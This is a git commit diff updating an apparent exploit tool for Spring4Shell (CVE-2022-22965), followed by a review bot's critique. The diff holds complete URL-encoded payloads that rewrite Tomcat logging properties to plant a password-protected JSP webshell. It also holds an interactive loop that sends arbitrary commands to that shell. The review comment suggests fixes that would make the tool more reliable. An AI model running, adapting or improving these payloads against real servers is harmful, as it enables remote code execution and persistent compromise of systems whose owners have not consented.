
Commit 29f4e20

authored
Update vul.py
1 parent ef391b3 commit 29f4e20

1 file changed

+24
-14
lines changed


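--- a/inc/vul.py
+++ b/inc/vul.py
@@ -22,40 +22,50 @@ def CVE_2022_22965(url, proxies):
 cprint("======开始对目标URL进行CVE-2022-22965漏洞利用======", "green")
 Headers_1 = {
 "User-Agent": random.choice(ua),
+"prefix": "<%",
 "suffix": "%>//",
+"c": "Runtime",
 "c1": "Runtime",
 "c2": "<%",
 "DNT": "1",
+}
+Headers_2 = {
+"User-Agent": random.choice(ua),
 "Content-Type": "application/x-www-form-urlencoded"
-}
-payload_linux = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
-payload_win = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
-payload_http = """?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
-data1 = payload_linux
-data2 = payload_win
+}
+payload_linux = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
+payload_win = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
+payload_http = """?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
+payload_other = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
+file_date_data = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_"
 getpayload = url + payload_http
 try:
 requests.packages.urllib3.disable_warnings()
-requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+requests.post(url, headers=Headers_2, data=file_date_data, verify=False)
+requests.post(url, headers=Headers_2, data=payload_other, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+requests.post(url, headers=Headers_1, data=payload_linux, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
 sleep(0.5)
-requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+requests.post(url, headers=Headers_1, data=payload_win, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
 sleep(0.5)
 requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
 sleep(0.5)
-test = requests.get(url + "tomcatwar.jsp", verify=False, proxies=proxies)
-if (test.status_code == 200) and ('aabysszg' in str(test.text)):
-cprint("[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "tomcatwar.jsp?pwd=aabysszg&cmd=whoami" ,"red")
+requests.get(url, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+test = requests.get(url + "shell.jsp", verify=False, proxies=proxies)
+test_again = requests.get(url + "shell.jsp", verify=False, proxies=proxies)
+if (test.status_code == 500) or (test_again.status_code == 200):
+cprint("[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "shell.jsp?pwd=aabysszg&cmd=whoami" ,"red")
 while 1:
 Cmd = input("[+] 请输入要执行的命令>>> ")
 if Cmd == "exit":
 sys.exit(0)
-url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}".format(Cmd)
+url_shell = url + "shell.jsp?pwd=aabysszg&cmd={}".format(Cmd)
 r = requests.get(url_shell, verify=False, proxies=proxies)
-resp = r.text
+r_again = requests.get(url_shell, verify=False, proxies=proxies)
+resp = r_again.text
 result = re.findall('([^\x00]+)\n', resp)[0]
 cprint(result ,"green")
 else:
-cprint("[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址请手动尝试访问:\n[/tomcatwar.jsp?pwd=aabysszg&cmd=命令] \n","yellow")
+cprint("[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址请手动尝试访问:\n[/shell.jsp?pwd=aabysszg&cmd=命令] \n","yellow")
 except KeyboardInterrupt:
 print("Ctrl + C 手动终止了进程")
 sys.exit()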
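Review bot: The first new request in the try block, `requests.post(url, headers=Headers_2, data=file_date_data, verify=False)`, is the only call in the hunk without `timeout=6`, so a host that accepts the connection and never answers blocks the script indefinitely where every neighbouring call gives up after six seconds; `requests.post(url, headers=Headers_2, data=file_date_data, timeout=6, allow_redirects=False, verify=False, proxies=proxies)` matches the surrounding calls. The new success check `if (test.status_code == 500) or (test_again.status_code == 200):` accepts any 500 from the first probe as confirmation, so an unrelated server error prints the `[+]` line and enters the command loop as a false positive; the reason for probing twice and for treating 500 as success deserves a comment on that line. The function still has no docstring; one should state that the request sequence rewrites the target's `pipeline.first.*` logging properties and leaves `shell.jsp` under `webapps/ROOT`, neither of which the tool reverts, so operators and responders know what artifacts a run leaves behind. The `def CVE_2022_22965(url, proxies)` line is outside the hunk.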
